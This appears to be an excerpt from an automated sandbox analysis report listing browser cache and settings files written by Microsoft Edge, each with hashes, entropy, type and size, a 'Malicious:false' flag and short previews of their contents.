                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNlTxl:Ls3dl
                                                                                                                                                                  MD5:36A5B3612AC5BB140D24D903B07A9F6D
                                                                                                                                                                  SHA1:C6E2F1F803B6B1F54C7D650D2F8CBC1F0162E193
                                                                                                                                                                  SHA-256:14C292EAE636DBD00E4A886ACA6EBF33F52AAE4ADC853C9E57D9144431BBC258
                                                                                                                                                                  SHA-512:FF5CB868F09F9C0C4F4E28EBF9F51FF11B8CCB2E79031FEF81C78FA341D427F24A540E1E2F8417BE1A93A3E0CCAF7E8FF6DE79A213FC7B3D5A88F82E6687C6A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................GI.H../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:LsNl9:Ls3
                                                                                                                                                                  MD5:4E11BC0BC57AC5C993AD15782A95B20B
                                                                                                                                                                  SHA1:1EC52CC88AC8ADDA202B79F5D6CA37EBA4A86E8E
                                                                                                                                                                  SHA-256:BA16816A758F44ABB6F5DF2CB10BAE2EB1C56E329E26B44DFB704625C76E606B
                                                                                                                                                                  SHA-512:DC75C96D8052AB45DE9FFC5CB6B67EAE05891AE4CA55136067FED1C7662209C028DE0CEAF606AAB666D5B7A5E6A0AFB3B0D6A4BDAF43C25999DBCFCF27F4CDAA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..........................................H../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:117.0.2045.47

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ccc7.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ccf6.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ce9c.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ceab.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3f5ac.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41f5b.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                  Entropy (8bit):5.789375762796217
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:iaqkHf1BCd5ih/cI9URLl8RotoJMFVvlwhue4IbONIeTC6XQS0qGqk+Z4uj+rjEy:aktBCSeiRUChu6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                  MD5:9E21B2DB893B756C097219FA3F097686
                                                                                                                                                                  SHA1:C677359A0EDEBD41238C1452A33A689A7A34325D
                                                                                                                                                                  SHA-256:3DBDE41ABA755128F124E0A4CDD1E81FD59F96FD2518CEE36E88B3EA1F367003
                                                                                                                                                                  SHA-512:EDFB937F766C4AEEAB3083C14F606C70AB0763285C88460441C2F47DF0559A39CAF27B2E6A8411ACAB1B0DBB59CA45CD0980C61C58F48320DFBB56690C8D0C34
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABJReHtLucWTJdvQHRJ7QWEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAcqolwnWwZiqGThP75aM2gcilbZedgckyBnWkzUbIAzgAAAAA

